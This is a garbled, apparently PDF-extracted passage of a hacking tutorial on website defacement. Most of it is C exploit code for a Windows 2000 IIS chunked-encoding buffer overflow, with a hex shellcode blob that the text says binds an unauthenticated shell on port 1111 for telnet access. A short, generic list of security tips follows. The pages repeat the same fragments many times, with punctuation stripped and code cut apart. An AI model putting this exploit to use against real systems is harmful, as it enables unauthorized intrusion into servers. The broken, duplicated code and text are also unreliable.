sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 25
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 26
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 27
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 28
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 29
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 30
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 31
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
